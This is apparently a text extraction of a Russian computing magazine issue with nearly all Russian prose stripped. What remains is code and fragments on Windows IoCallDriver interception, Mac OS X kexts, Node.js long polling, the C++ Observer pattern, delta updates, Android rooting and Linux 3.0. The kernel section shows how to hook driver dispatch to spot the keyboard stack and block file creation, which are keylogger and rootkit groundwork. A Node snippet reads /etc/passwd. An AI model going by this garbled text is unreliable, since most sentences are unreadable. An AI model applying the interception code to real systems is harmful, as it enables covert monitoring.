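    IN PDEVICE_OBJECT DeviceObject,
    IN OUT PIRP Irp
    )
{
    PIO_STACK_LOCATION irpSp;
    PDRIVER_OBJECT driverObject;
    NTSTATUS status;

    // Move the IRP to the stack location of the driver being called
    Irp->CurrentLocation--;
    irpSp = IoGetNextIrpStackLocation( Irp );
    Irp->Tail.Overlay.CurrentStackLocation = irpSp;
    // Record the target device in that stack location
    irpSp->DeviceObject = DeviceObject;
    // Dispatch through the target driver's MajorFunction table
    driverObject = DeviceObject->DriverObject;
    status = driverObject->MajorFunction[irpSp->MajorFunction](
        DeviceObject, Irp );
    return status;
}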
, IoCallDriver
IofCallDriver, , ,
IopfCallDriver. ,
,
, ,
IoCallDriver. ! - , , major . , , IoCallDriver, ,

( , , ,
?), .

,
. IRP-,
IoCallDriver,
, . , MJ- IRP_MJ_CREATE

. - ,
IRP- , , ,
IRP-, ,
. , IoCallDriver
DeviceObject, ,
, IRP.
. IRP- IRP_MJ_
READ. IoCallDriver, IRP-,
MajorFunction IRP_MJ_READ. ,
? , , DeviceObject.
.
, ( ) ,
:
BOOLEAN IsKeybordDevice( DEVICE_OBJECT * topDevice )
{
    UNICODE_STRING driverName = {0};
    DEVICE_OBJECT * device = 0;
    RtlInitUnicodeString( &driverName, L"\\Driver\\Kbdclass");
    // Walk the device stack from the top device down through AttachedTo
    for (device = topDevice;
         device;
         device = device->DeviceObjectExtension->AttachedTo)
    {
        // RtlCompareUnicodeString returns 0 on a match (TRUE = case-insensitive)
        if ( !RtlCompareUnicodeString(
                &device->DriverObject->DriverName, &driverName, TRUE))
            return TRUE;
    }
    return FALSE;
}


DeviceObject. ,
DRIVER_OBJECT. , IRP, , , IO_STACK_
LOCATION *stack = IoGetCurrentIrpStackLocation(pIrp).

- stack->FileObject.
,
IRP-, . , ,
- c .
!
IoCallDriver,
IRP- IRP_MJ_CREATE, stack->FileObject
:
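OBJECT_NAME_INFORMATION *fileNameInformation = 0;
ULONG retSize = 0;
// ObQueryNameString needs a caller-allocated buffer; 1024 is the size passed below
fileNameInformation = ExAllocatePoolWithTag(PagedPool, 1024, 'mNbO');
if (fileNameInformation)
{
    status = ObQueryNameString( stack->FileObject,
        fileNameInformation, 1024, &retSize);
    // Both names are counted UNICODE_STRINGs, so print them with %wZ
    // instead of joining them with wcscat
    if (NT_SUCCESS(status))
        DbgPrint("file name now is: %wZ%wZ \n",
            &fileNameInformation->Name, &stack->FileObject->FileName);
}
... IRP-, , , , .
ULONG CreateDisposition =
    (stack->Parameters.Create.Options >> 24) & 0x000000ff;
if ((CreateDisposition == FILE_CREATE) ||
    (CreateDisposition == FILE_OPEN_IF) ||
    (CreateDisposition == FILE_OVERWRITE_IF))
{
    // Fail the request: complete the IRP here instead of passing it on
    Irp->IoStatus.Status = STATUS_ACCESS_DENIED;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    if (fileNameInformation)
        ExFreePool(fileNameInformation);
    return STATUS_ACCESS_DENIED;
}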

IRP-,
IoCallDriver, . , IoCallDriver
Windows.
, IRP- -, IRP-. ,

FastIO, . ,
IRP- ,
, IoCallDriver
. / IoCallDriver
BSODa DRIVER_UNLOADED_WITHOUT_CANCELLING_
PENDING_OPERATIONS. ,
,
IRP-. :
, IoCallDriver, IRP-.

,
. , . ,

. ,
! z


(seva@vingrad.ru)

KERNEL- MAC OS X
Mac OS X
iOS .
,
? . .

BSD

Mach
XNU


NKE

I/O Kit

MAC OS X
, . Mac OS X XNU (XNU is not UNIX). XNU
, : Mach, BSD -
IO Kit.
Mach ,
80- . , , , , ,
.
, GNU/HURD, GNU
Linux, , . -, , Mac OS X ,
, :). ,
Mac OS X Mach :
, ,
. ,
, ,
.
Mach- XNU :
;
;
;


kext

;
-.
BSD Mac OS X FreeBSD :
;
POSIX API, BSD;
TCP/IP BSD-;
;
;
.
Mac OS X
- IO Kit. C++ . ,
, , , , RTTI.
IO Kit C++,
. ,
IO Kit , ,
.

, : , . GDB.
kext , .
kext-manager.
kext' /System/Library/Extensions.
kext' ( ) Mac OS X
XCode. IDE.
:
1. XCode :).
2. Generic Kernel
Extension, C,
IO Kit- C++.
3. SampleKext (, :)).

,
SampleKext.c. :
SampleKext_start SampleKext_stop. , / .
, kext'


Mac OS X
, kext' (
kernel extension). XNU,

. , IOKit
kext. Kext , Mac OS X, :
plist-, , ;
Mach-O-,
, ;
, ..
kext ,
kextload . . kext' .
, . ,


kext

callback'
/ . , SampleKext_start ,
kext'.
, / .
SampleKext.c
#include <sys/systm.h>
#include <mach/mach_types.h>
// Called when the kext is loaded
kern_return_t SampleKext_start (kmod_info_t * ki, void * d)
{
    printf("Kext loaded.\n");
    return KERN_SUCCESS;
}
// Called when the kext is unloaded
kern_return_t SampleKext_stop (kmod_info_t * ki, void * d)
{
    printf("Kext unloaded.\n");
    return KERN_SUCCESS;
}
, SampleKext.kext, ,
plist-.
kext Info.plist XML-.
:
CFBundleIdentifier kext'. , com.apple.
driver.AppleUSBMergeNub.
CFBundleExecutable kext'.
IO Kit-.

CFBundleVersion .
OSBundleLibraries , kext.
IOKitPersonalities IO Kit,
kext. , .

,
, kext'
OSBundleLibraries. , ,
kextlibs. -xml, XML-,
plist-:
kextlibs -xml MyKext.kext
<key>OSBundleLibraries</key>
<dict>
<key>com.apple.kpi.libkern</key>
<string>9.2.2</string>
</dict>
kext .
Info.plist. kext , :
kext' .
/tmp :
sudo cp -R SampleKext.kext /tmp
:
sudo kextload /tmp/SampleKext.kext
/var/log/system.log
kext'a. kext, kextunload: sudo kextunload /
tmp/SampleKext.kext.


KEXT'

OSBUNDLELIBRARIES

OUTRO
Mac OS X. ,
, .

, , , .
kernel-! z


(kononencheg@gmail.com)

JavaScript

NODE.JS
,
JavaScript.


,
.
, JS !


LINKS

INFO

nodejs.org
,

.



Node.js.

.


publish/subscribe,

Redis. ,
.


JavaScript

NODE.JS

,
. Python Twisted
. Node.js .
, Node.js I/O JavaScript. ,
JavaScript-, ,
, ,
, HTTP- .
, c , web, :
var http = require('http');
http.createServer(function(request, response) {
response.writeHead(200, {'Content-Type': 'text/plain'});
response.end(', !');
}).listen(8080, '127.0.0.1');
console.log(' http://127.0.0.1:8080/');
:
% node __.js
http://127.0.0.1:8080/
, <html>
<head><title>... . ;) !
? !
. !
JavaScript- Node V8,
/ .
,
. , Node

, -, -. , , .

NODE
, ,
require. ( )
.
. ++ V8, JavaScript. JS- :
circle.js
exports.area = function (r) {
    return Math.PI * r * r;
};
exports.circumference = function (r) {
    return 2 * Math.PI * r;
};
exports.
,
(area circumference ). :
var circle = require('./circle.js');
console.log( ' 4 %d',
circle.area(4));
,
console,
stdout stderr. log() printf- (
JavaScript . . .)
stdout, error() stderr.
process,
.
,
:
process.stdout, process.stderr process.stdin /. write ,
concole.log console.error, stdin
. Node -,
. :
process.stdin.on('data', function (chunk) {
//
process.stdout.write('data: ' + chunk);
});


, ,
callback-. .
, , ,
.
process.argv , .
//
process.argv.forEach(function (val, index, array) {
console.log(index + ': ' + val);
});


process.cwd() .
process.pid, process.getgid() process.getuid() id , gid uid.
process.kill(pid, signal='SIGTERM') .
process.exit(num) . ,
,
:
process.on('exit', function () {
console.log(' ... ...');
});

,
, , Node.
, Node.js
. , , ,
, -! -
CGI-, , !
.



,

real-time web.
. ,
, ,
.
- !
--
, :
Soket.IO http://socket.io/
. . , , .
: - .
, . ,
, .
( !) Beseda,
,
(goo.gl/9SoJR). Bayeux
.
,
. , Soket.IO , -.

( 5000). Beseda 20 000 . -
.

!
,
. , .
Node.js JavaScript,
. .
io.js.
server.js index.html.
long-polling-, . ,
, .
,
Soket.IO ,
, ! -,


NODE
Node.js .
:
fs .
, .

var fs = require('fs');
fs.readFile('/etc/passwd', function (err, data) {
    if (err) throw err;
    console.log(data);
});
crypto : (sha1, md5, sha256, sha512 . .),
, , .
net TCP.
var net = require('net');
var server = net.createServer(function (c) {
c.write('hello\r\n');
c.pipe(c);
});
server.listen(8124, 'localhost');
dgram UDP- .
events .
util : , .
tls OpenSSL, SSL-
.
vm JavaScript-, . .
(eval ) js- .
var localVar = 123,
usingscript, evaled,
vm = require('vm');
usingscript = vm.runInThisContext('localVar = 1;',
'myfile.vm');
console.log('localVar: ' + localVar +
', usingscript: ' + usingscript);
// localVar: 123, usingscript: 1
dns (MX . .).
http, https web-.
child_process , , exec,
spawn . .
os , .
, , : MySQL
-.

JS-
NODE

V8

JavaScript

. , long-polling-, . .
,
,
, .
io.js :
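// How often the main loop runs, in milliseconds
var CHECK_INTERVAL = 1000;
// How many loop iterations a held request may wait for data
// before it is answered with an empty body
var MAX_LOOP_COUNT = 10;
// Registered connections, keyed by connection id
var connections = {};
// Per-connection state for long polling
var LongPollingData = function() {
    this.loopCount = MAX_LOOP_COUNT;
    this.dataQueue = [];
    this.response = null;
};
// One pass of the main loop over all connections
function mainLoopIteration() {
    var pollingData;
    for (var id in connections) {
        pollingData = connections[id];
        if (pollingData.response) { // a request is currently being held
            pollingData.loopCount--;
            // Answer when data is queued or the wait has run out
            if (pollingData.dataQueue.length
                    || pollingData.loopCount === 0)
                flush(pollingData);
        }
    }
}
// Send the queued messages, joined with '|', and release the held response
function flush(pollingData) {
    pollingData.response.end(pollingData.dataQueue.join('|'));
    pollingData.dataQueue = [];
    pollingData.response = null;
}
setInterval(mainLoopIteration, CHECK_INTERVAL);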
. , ,
, ,
. .
!
, .
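var lastID = 0; // counter used to build connection ids
// Register a new connection and return its id to the client
var init = exports.init = function(request, response) {
    var id = 'connection_' + ++lastID;
    connections[id] = new LongPollingData();
    response.end(id);
};
// Hold a GET request open until data arrives or the wait runs out
var hold = exports.hold = function(id, request, response) {
    // Unknown id (for example /favicon.ico): refuse instead of throwing
    if (!Object.prototype.hasOwnProperty.call(connections, id)) {
        response.writeHead(404);
        response.end();
        return;
    }
    var pollingData = connections[id];
    if (pollingData.response !== null)
        flush(pollingData);
    pollingData.response = response;
    pollingData.loopCount = MAX_LOOP_COUNT;
};
// Queue data for one connection
var write = exports.write = function(id, data) {
    if (!Object.prototype.hasOwnProperty.call(connections, id))
        return;
    connections[id].dataQueue.push(Buffer.from(data.toString()));
};
// Queue data for every connection
var broadcast = exports.broadcast = function(data) {
    for (var id in connections) write(id, data);
};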
,
require:
var io = require('./mycoollibrary/io.js');
io.broadcast(' ');

WebSocket HTTP.
Flash Socket WebSoket
. -.
Long polling . ,
HTTP- ,
- ,
. jsonp-
. .
Multipart streaming . HTTP, .
Firefox.
Forever Iframe ,
. .


,
. server.js :
var http = require('http'),
    fs = require('fs'),
    io = require('./io.js'); // the long-polling module shown above
var server = http.createServer();
server.addListener('request', handleRequest);
server.listen(80, 'localhost');
function handleRequest(request, response) {
    if (request.method === 'POST') {
        // POST registers a new connection
        io.init(request, response);
    } else {
        if (request.url === '/' || request.url === '/index.html') {
            fs.readFile('./index.html', function (err, content) {
                if (err) { // index.html is missing or unreadable
                    response.writeHead(500);
                    response.end();
                    return;
                }
                response.end(content);
            });
        } else {
            // Any other GET is a poll: the last path segment is the connection id
            io.hold(request.url.split('/').pop(), request, response);
        }
    }
}
// Broadcast a message to every client every 500 ms
setInterval(function() {
    console.log(" !");
    io.broadcast(" !");
}, 500);
POST- , GET- /_
.
500 .
, ,
.
. , , .
index.html (
jQuery):


<script>
var conectionID;
function connect() {
$.post("http://localhost/", function(data) {
conectionID = data;
poll();
});
}
function handleData(data) {
data = data.split('|');
while(data.length > 0)
$('body').append(data.shift() + '\n');
poll();
}
function poll() {
$.get("http://localhost/" + conectionID, handleData);
}
connect();
</script>

. , .
, ,
, .

, Node.js , , .
, ,
JavaScript, ! ,
... . z


/ TIPS&TRICKS

deeonis (deeonis@gmail.com)

.
,
-.
,
, ,
.

[Class diagram: the Observable interface (AddObserver(o: Observer), RemoveObserver(o: Observer), NotifyObserver()) is implemented by ConcreteObservable, which keeps observers: Observer[] (0..*); the Observer interface declares HandleEvent() and is implemented by ConcreteObserver.]


, ,
. , , HDD,
. ,
, ring-3
.
, .

,
. . ,
, ,
.

SystemInfo,
.
, ,
SystemInfo . , .

SystemInfo
class SystemInfo
{
public:
    // ...
    float getCPUTemp();
    float getGPUTemp();
    int getHDDSpeed();
    void notifyClients();
};


/ TIPS&TRICKS
getCPUTemp, getGPUTemp getHDDSpeed
. ,
. notifyClients, ,
,
.
- SystemInfo. ,
, , notifyClients
.


,
,
HDD. , notifyClients, ,
- . ,
, : cpuTemp, gpuTemp hddSpeed.
SystemInfo,
notifyClients, ,
:
notifyClients()
void SystemInfo::notifyClients()
{
    // Read the current values once, then hand them to every client
    float t_cpu = getCPUTemp();
    float t_gpu = getGPUTemp();
    int s_hdd = getHDDSpeed();
    cpuTemp.update(t_cpu, t_gpu, s_hdd);
    gpuTemp.update(t_cpu, t_gpu, s_hdd);
    hddSpeed.update(t_cpu, t_gpu, s_hdd);
}
, , ? -,
. SystemInfo

. , , ,
,
, , ,
. -, ,
update(),
SystemInfo , . -, update() , .
.


,
.
,
, , ,
.
, .
.
, : , , . . Subject,
, , . . Observer. Subject
, , . Observer
.


, ,
.
Subject Observer.


Subject Observer
class Observer; // defined below

class Subject
{
public:
    virtual void registerObserver(Observer &obs) = 0;
    virtual void removeObserver(Observer &obs) = 0;
protected:
    virtual void notifyObservers() = 0;
};
class Observer
{
public:
    virtual void update(float t_cpu, float t_gpu, int s_hdd) = 0;
};
registerObserver() removeObserver() / .
notifyObservers() , update()
Observer .
: SystemInfo, CpuTemp, GpuTemp HddSpeed.

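#include <algorithm>
#include <vector>

class SystemInfo : public Subject
{
public:
    void registerObserver(Observer &obs)
    {
        // Add the observer to the list of subscribers
        observers.push_back(&obs);
    }
    void removeObserver(Observer &obs)
    {
        // Remove the observer from the list of subscribers
        observers.erase(std::remove(observers.begin(), observers.end(), &obs),
                        observers.end());
    }
    //...
    // Getters as declared in the first SystemInfo listing
    float getCPUTemp();
    float getGPUTemp();
    int getHDDSpeed();
protected:
    void notifyObservers()
    {
        // Walk the list and call update() on every registered Observer
        float t_cpu = getCPUTemp();
        float t_gpu = getGPUTemp();
        int s_hdd = getHDDSpeed();
        for (size_t i = 0; i < observers.size(); ++i)
            observers[i]->update(t_cpu, t_gpu, s_hdd);
    }
private:
    std::vector<Observer *> observers;
};
class CpuTemp : public Observer
{
public:
    // ...
    void update(float t_cpu, float t_gpu, int s_hdd)
    {
        // Handle the values received from SystemInfo
    }
};
// GpuTemp and HddSpeed are declared
// the same way as CpuTemp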
registerObserver() removeObserver() , , ,
. , ,
-



#include <cstddef>

struct SIData
{
    float t_cpu;
    float t_gpu;
    int s_hdd;
};
class SystemInfo : public Subject
{
public:
    // ...
    // Getters that an observer calls to pull the values it needs
    float getCpuTemp();
    float getGpuTemp();
    int getHddSpeed();
    // ...
};
class Observer
{
public:
    virtual void update(SIData *data = NULL) = 0;
};
PHP-

STL-. notifyObservers() ,
update().
, Observer,
SystemInfo, .
. , SystemInfo
, , Observer.
,
SystemInfo. ,
, . .


,
SystemInfo.
, GpuTemp
, HDD .

, update(),
. . . SystemInfo
, / SSD-,
Observer, ,
update() ,
. notifyObservers().
, , .

( ) . update() .

. ,
, ,
, . .
SystemInfo.


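class CpuTemp : public Observer
{
public:
    // sysInfo is the subject this observer pulls its readings from
    explicit CpuTemp(SystemInfo &info) : sysInfo(info) {}
    // ...
    void update(SIData *data)
    {
        float t_cpu;
        if (data == NULL)
            t_cpu = sysInfo.getCpuTemp(); // nothing was pushed: pull the value
        else
            t_cpu = data->t_cpu;          // use the pushed value
        // Handle the value received from SystemInfo
    }
private:
    SystemInfo &sysInfo;
};
// GpuTemp and HddSpeed are declared
// the same way as CpuTemp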
, Observer,
, Subject.
, ,
- , . C++
,
. Observer,
Subject.
-
Subject.
,
, Observer
, Subject,
.

-, ,
, . , - . z


UNIXOID

(execbit.ru)

,

.

, ,
diff.
,

,

.


LINKS
goo.gl/MaO8l

Ksplice.

INFO
Debdelta
'--delta-algo',


.
: xdelta,
xdelta-bzip, xdelta3
bsdiff.
Makefile
binpatchng

,
,


OpenBSD (goo.
gl/FY7PX).


.
Ksplice ,
uptime 100 %,
xdelta bsdiff,
,
deltup, 95 %.
binpatchng,
OpenBSD .

KSPLICE
, Ksplice Oracle . ( , , ),
Linux ,
-
.
Ksplice ,
. .
,
Linux-
, diff-.
, ,


, ,
. - ,
.
ksplice.ko, -
. ksplice.ko
, , -.
, .
,
,
, ,
,
. Ksplice , 84 % bugfix-
, .
.
, 2009 ., Ksplice Inc.,
, Ksplice-.

. : Ksplice
Oracle,
-
Ubuntu Fedora, RHEL Unbreakable Linux. .
, . Ubuntu Fedora
ksplice.com , :
$ sudo apt-get install curl
$ sudo dpkg -i ksplice-uptrack.deb
.
. Install,
.
- ,
. .

XDELTA, BSDIFF
, Ksplice
, ,
. UNIX :
xdelta, rsync,
,
xdelta3 bsdiff,
BSD-.

diff, ,
.

, ,
, tar.gz- . ,
, , Wikipedia (ru.wikipedia.org/wiki/
-), ,
.
diff? :
,
.
,
, . -


OpenBSD 4.8

, ,
- ,
.
,
. -, . pacman ArchLinux
debdelta, Debian.
-, delta-,
.
, ,
, , (
). -, ,
. , ( )
( debdelta,
, ).
, :
ArchLinux .
xdelta:
$ sudo pacman -S xdelta3
/etc/pacman.conf,
UseDelta. /etc/pacman.d/
mirrorlist :
Server = http://delta.archlinux.fr/$repo/os/$arch
:
$ sudo pacman -Syu
, , .
, archlinux.fr , ,
, .
Debian .
( , ) debdelta,
deb- ,
xdelta
.
,

deltup Gentoo , FreeBSD.
, deltup-. , ,
:
Gentoo . deltup getdelta:
$ sudo emerge deltup getdelta
/etc/make.conf :
$ sudo vi /etc/make.conf
FETCHCOMMAND="/usr/bin/getdelta.sh \"\${URI}\" -O \"\${DISTDIR}/\${FILE}\""
emerge ,
getdelta .
/etc/deltup/getdelta.rc :

binpatch Makefile

apt-get.
, debdelta apt-get,
:
$ sudo apt-get update
$ sudo debdelta-upgrade
$ sudo apt-get upgrade

$ sudo vi /etc/deltup/getdelta.rc
# ( )
LOCAL_MIRROR=1.2.3.4
#
MAXIMUM_ACCEPTABLE_QUEUEPOS=10
#
REMOVE_OLD=yes
LOCAL_MIRROR ,
, Gentoo-, deltup-. MAXIMUM_
ACCEPTABLE_QUEUEPOS
. deltup-
,


( ).
debdelta :
$ sudo apt-get install debdelta
, BSD- xdelta bsdiff
(www.daemonology.net/bsdiff) .
freebsd-update
FreeBSD 2005 . ,
freebsd-update install, bsdiff ( ,
bspatch), . BSD-,
, bsdiff BSD.

DELTUP

, Gentoo. deltup
(deltup.sourceforge.net),
, ,
diff, ,

. , deltup-
,
,
. : deltup- 15 %
, 5 % ( deltup-: goo.gl/IetJU).


Ksplice


, inux01.gwdg.de

. - ,
, , . - deltup- ,
linux01.gwdg.de, getdelta
.
,
.
deltup FreeBSD.
deltup- Gentoo (-
).
FreeBSD deltup , :
1. deltup wget :

$ cd /usr/ports/sysutils/deltup
$ sudo make install clean
$ cd /usr/ports/ftp/wget
$ sudo make install clean


$ bsdiff _ _ _
$ bspatch _ _ _
$ xdelta3 -e -s _ _ _
$ xdelta3 -d -s _ _ _
$ deltup -mjb 9 _ _ _
$ deltup -p _
$ debdelta _ _ _
$ debpatch -A _ / _


2. /etc/make.conf :

$ sudo vi /etc/make.conf
FETCH_CMD=/usr/local/bin/getdelta.sh
, - portupgrade, deltup-.
, deltup
, ,
( gzip bzip2).
, NO_CHECKSUM:
$ cd /usr/ports/games/cowsay
$ make NO_CHECKSUM install clean

OPENBSD BINPATCH
, ,
, ,
OpenBSD.
,
OpenBSD, ,
.
, .
, , ,
, /
, .
, . OpenBSD
,
OpenBSD, ,
.
,
,


Ksplice

, . ,
binpatch (openbsdbinpatch.sf.net), , ,
. binpatchng (binpatchng.puffy-at-work.org),

, OpenBSD-, ,
.
Binpatchng Makefile
. , Makefile , , make.

,
.
:

3.
( ftp://ftp.openbsd.org/pub/OpenBSD/4.9/i386/)
distfiles/_.
4. Makefile. www.openbsd.org/
errata.html, ( 4.9 ,
4.8), ( 001_
bgpd.patch), .
. Makefile. :
/usr/binpatchng-1.1/Makefile :

# vi /usr/binpatchng-1.1/Makefile
# ? ( ,
# .)
ARCH=i386
# ( patch)
PATCH_COMMON=001_bgpd
# 001_bgpd.patch
001_bgpd:
cd ${WRKSRC}/usr.sbin/bgpd
(${_obj}; ${_depend}; ${_build})
#
,
, .

. , :
cd usr.sbin/bgpd
make obj
make depend
make
make install
Makefile, . ,
Makefile.sample. :
# cd /usr/binpatchng-1.1/
# make PATCH="001" build
# make PATCH="001" plist
# make PATCH="001" package

patches,
:
# pkg_add binpatch-4.9-i386-001.tgz z

1. /usr
( ):
$ cd /tmp; wget http://goo.gl/hvF7O
$ su
# tar -xzf /tmp/binpatchng-1.1.tar.gz -C /usr
2. sys.tar.gz src.tar.gz FTP
distfiles, binpatchng:
# cd /usr/binpatchng-1.1/
# mkdir distfiles
# cd distfiles
# wget ftp://ftp.openbsd.org/pub/OpenBSD/4.9/sys.tar.gz
# wget ftp://ftp.openbsd.org/pub/OpenBSD/4.9/src.tar.gz


Ksplice


UNIXOID

(execbit.ru)

MEGAFAQ
ANDROID OS
, , ,
- Android
,
,
,
,
.
.
FAQ
,
,
Android.
, , root
Android, ,
,
Android , , .

ANDROID
?

Android
.
,
Android :
1. . Android-
, . ,

,
. , ,
Java, .
2. . Android
Linux-

.


Android ( 5 )

(app_1, app_2, app_3 . .)


umask 0026
(u=rwx,g=rx,o=x).
, .
3. . Android-
, ,
,
.
-
.
, Android , ,
. Android
, ,
,

( Android ,
).

,

root,
, Linux,
, ,

, su

( , root-
T-Mobile G1,
telnet).
root (
su) ,
.
(Motorola, !)
NAND-,
,

root ( ,
).

.
,
, busybox,
, ,
root (,
), .
root ,

.
Rooting root

.

Android



,
Linux- root
.
SuperOneClick (goo.gl/HIbN),
, z4root (goo.gl/Bv7tx),
Android.


, 95 %
,
:
, , - ,

-- .
.
,
Android Google
.

, . ,
Android
CyanogenMod (www.cyanogenmod.com).
.

CYANOGENMOD
ANDROID?

CyangenMod , ,
,
Google, ,
, .

,
Google.
,


( / JIT,
, , ,
,

).
(,
),

SD-,
, T-Mobile,
,
, ,
FM- ( FM-),


(/ Wi-Fi,
Bluetooth, 3G . .).
busybox SSH-, . CyanogenMod
,

(www.cyanogenmod.com/devices).
,
CyanogenMod. xda-developers.com.

,

.
,
Windows.

,
,

(
).

, ,

( CyanogenMod),
. , (, ROM
Manager
SuperOneClick), SD-
zip- ,
,
Flash zip from sdcard, zip- .

Android ( )

NAND-,
Recovery ,
/

/,
,
(). Recovery
, ,


(

). ,

(, ) (Enter).

Recovery
.
, ( ),
(nandroid
backup) , Android,
swap,
/ .


, Android Market,
. Launcher,
Google, ,
, .
LauncherPro Zeam.
, Android Market ,
. -, Launcher7,
Windows Phone 7, , ,
. -, SlideScreen (
beta- : getsatisfaction.com/larvalabs),
(, SMS-, , , RSS-,
, Facebook . .) .
, - .
Simple Home, Windows Phone 7,
Spark, Android SlideScreen.


CyanogenMod

CyanogenMod

CyanogenMod

ClockworkMod recovery,
Koushik Dutta (Koush).

lib Linux- (
), media
, bootanomation.zip ,
,
, audio
, . . (
Ogg Vorbis, ).
usr ,
Linux-
. build.prop .

,
:

.
:
Android ,
Linux-,
( ,
,

).
Android,
.
:
.
,
Android , ,
,
Android . ,
, ,
. , ,
,
,
(/ ,
), . :
:
$ wget http://a.b.c/update.zip


$ mkdir myrom
$ cd myrom
$ unzip ../update.zip

boot.img. META-INF
- ,
,
META-INF/com/google/android/
updater-script, , ,
Recovery .
boot.img Linux
ram-,
split_bootimg.pl (goo.gl/QejM9). ,
system
. ,
Android, . app,
( , , ), bin xbin Linux- ( xbin
busybox), etc
, fonts , framework Java-,
framework-res.apk
, ,
( xda-developers.com ),

$ zip -r myupdate.zip *
, Recovery
.
testsign.jar:
$ wget http://goo.gl/OyBBk
$ java -classpath testsign.jar testsign \
myupdate.zip myupdate-sign.zip
SD-
Recovery.


SetCPU,


Android ( ): ADW.Launcher, Launcher7, Simple Home, SlideScreen

.

,
:
,
, . .
CyanogenMod:
CyanogenMod .
, SetCPU.
/
JIT-,
(
RAM)
VM heap,
(
)
( ).
root, Jitter VM Heap Tool.

TASK KILLER ?

Task Killer , .

,

. , Android,


, ,



.
,

, .
,
.

:

.
,

.
, ,

, . ,
,

. /sys/
module/lowmemorykiller/parameters,
,
lowmemorykiller:
echo "2560,4096,6144,12288,14336,18432" > /sys/module/lowmemorykiller/parameters/minfree


/system/etc/init.d, ,
/system/etc/init.d ,
. ,
.


. Android
,
,
. , , , , Bluetooth, , ( Gmail,
), (,
).
, Startup Cleaner
( ).


ADB?

ADB Android Debug Bridge, Android-,


, , ,
,

.

(][_09_2011), . z


UNIXOID

Adept (adeptg@gmail.com)

3.0
?

Tux
Linux

LINUX KERNEL 3.0:


Linux 20-.
2.6.40 3.0. ,
, ,
2.6.

Linux
. - ( 2011.4.0),
. 2.6.40 3.0, (. .
3.0.1).
- , 40
. 40 ,
.
3.0
2.6.
:
Xen
.
Btrfs,
. : ext4
, OCFS2
TRIM (
SSD). CIFS Windows 2008 DFS ( ).

tcpdump.
64- .
Wake on WLAN. Wake on
LAN, .
/ ICMP-
root. SUID /bin/ping.
Cleancache, , ( ).


3.0

Intel

: Microsoft
Kinect, Intel (Ivy Bridge)
AMD Fusion.

rt- (Realtime) , Linux
. 2.6.33.

(374 690),
.
, , 3.0, 361
Microsoft.
Hyper-V. ,
Microsoft Linux.
Linux, Microsoft,
Microsoft Linux.

, IT-
. , , KVM (Kernel-based
Virtual Machine, Linux 2.6.20). ( )
Xen 3.0. ( ), KVM
CPU .
Linux ( )
, .
, KVM Xen, VMWare MS Hyper-V.
lguest. KVM
. Xen .
5000 . -
: .

, .
KSM (Kernel Samepage Merging),


. , .
, ,
.
Linux OpenVZ,
. LXC, : namespaces (
,
, .) Control Group
( ).


.
- (). 2.6
, :
SMP- 4096.
,
, 32 65 536.
.
, , mission critical,
, . , , CPU hotplug,
Linux 2.6.
, , -
(), , .
2.6 Big
Kernel Lock , Linux 2.0 SMP-,
. Receive Packet Steering
(RPS) Receive Flow Steering (RFS),
CPU.
, : Tile, 32- .
RAID. 2.6 :


RAID6 (
).
RAID5 reshaping
.
RAID1 RAID5, RAID4 RAID5,
RAID5 RAID6 ( ).

. ,
- (,
, iSCSI AoE).
Oracle Cluster Filesystem (OCFS2)
Oracle.
Global File System (GFS2) , RedHat.
, , -.
( ), :
POHMELFS (Parallel Optimized Host Message Exchange Layered File
System) ( ,
, , ) NFS.
Ceph , (
) (
,
).
, 2.6 , DRBD,
( , RAID1).
:
exofs, OSD- (Object Storage Devices).
, ,
.
, , , .
libata NCQ hotplug.


InfiniBand,
RDS (Reliable Datagram Sockets),

. -500
90 % Linux.

desktop-
x86/amd64, .
, embedded-CPU-. 2.6
: UniCore, m68knommu, m32r, Fujitsu FR-V, Atmel AVR32,
MicroBlaze, S-core. 2.6 embedded linux:
,
Linux .
Execute-in-place .
ASoC (ALSA System on Chip)
ALSA SoC ( ).
UBI - LVM raw-flash- (
). LVM . Nokia
UBIFS, UBI-.
, Flash-, LogFS.
.
SPI SDIO (Secure Digital I/O)
MMC/SD- (GPS-,
Wi-Fi-, Bluetooth- Ethernet- ).
CAN (Controller Area Network). , ,
.
Linux Sony
PS3 (, ), Nintendo Wii Gamecube.
embedded-,
. Google Android Linux . Google, Android,
, ,
.


Linux PC , 2.6.0 12 %.
, Linux user.
, desktop-,
. 2.6
(, Linux ). :

3.0
3.0 ,
,
(, #ifdef LINUX2
).
,
Fedora 15 Linux 3.0 2.6.40,
.


3.0

GPU switching . , X Server


.
HDD 512 (
4 ).
PPTP L2TP. .
HDD . .
CFS (Completely Fair
Scheduler)
.
,
,
(tickless),
.

, Microsoft 20 Linux

, , Linux
. -
, - . 2.6
FUSE (Filesystem in Userspace). ,

( ), .
,
,
. :
SSHFS SFTP.
GmailFS Gmail.
WikipediaFS Wikipedia
( ).
, FUSE:
NTFS-3G NTFS Linux.
ZFS-Fuse ZFS (
- ).

menuconfig

USB
UVC (Universal Video Class)
gspca - (
230 -UVC-).
USB3.0 ACPI4.0 Linux ,
.
: Wireless USB, WiMAX (IEEE 802.16).
Nvidia Nouveau 3D-.
Kernel mode-setting (

, X Server)
. .
USB , VGA- USB-.
hibernation
/ .


FUSE CUSE,
( )
. ,
, , OSS Proxy,
OSS /dev/dsp, /dev/adsp /dev/mixer.


3.1 ,
, . :
Open-Source-CPU- OpenRISC.
Nintendo Wii
Wii Remote.
Intel (Sandy Bridge).
Nouveau
GeForce 400/500.
Intel GMA500.

Intel ,
-
, , , Intel GMA500 PowerVR SGX 535
Imagination Technologies.


DCCP (Datagram Congestion Control Protocol, RFC 4340) .


, , ,
(VoIP, /, ).
IEEE 802.11s mesh-.
peer-to-peer- ,
. B.A.T.M.A.N. (Better Approach To
Mobile Adhoc Networking), mesh-.
,
. www.open-mesh.com.


accel-pptp, PPTP/PPPoE/L2TP- PPTP-


.
CPU.



RedHat
Novell
IBM
Intel

Linux Foundation
Consultant
SGI
MIPS Technologies
Oracle
MontaVista

Google
Linutronix
HP
NetApp
SWsoft

, :
Linux

:
ext4 ext3. , , 1 (260 ).
NILFS2 - ,

, .

.
Btrfs ZFS Sun ( Oracle)
(, ,
SSD ).
, . ( Fedora 17).
Squashfs read-only-
. , , LiveCD/USB.
Ecryptfs , .
, . . /,
.

: NTFS,
/ HFS+ HFSX ( Mac OS X), / UFS2
( BSD-).
FS-Cache, ,
, NFS, AFS CIFS.
.

2.6 IPv6 (netfilter, SELinux, ),


:
UDP-lite (RFC 3828) UDP-,

.
(VoIP, ) , .


(Mandatory Access
Control), , SELinux, :
AppArmor SELinux,
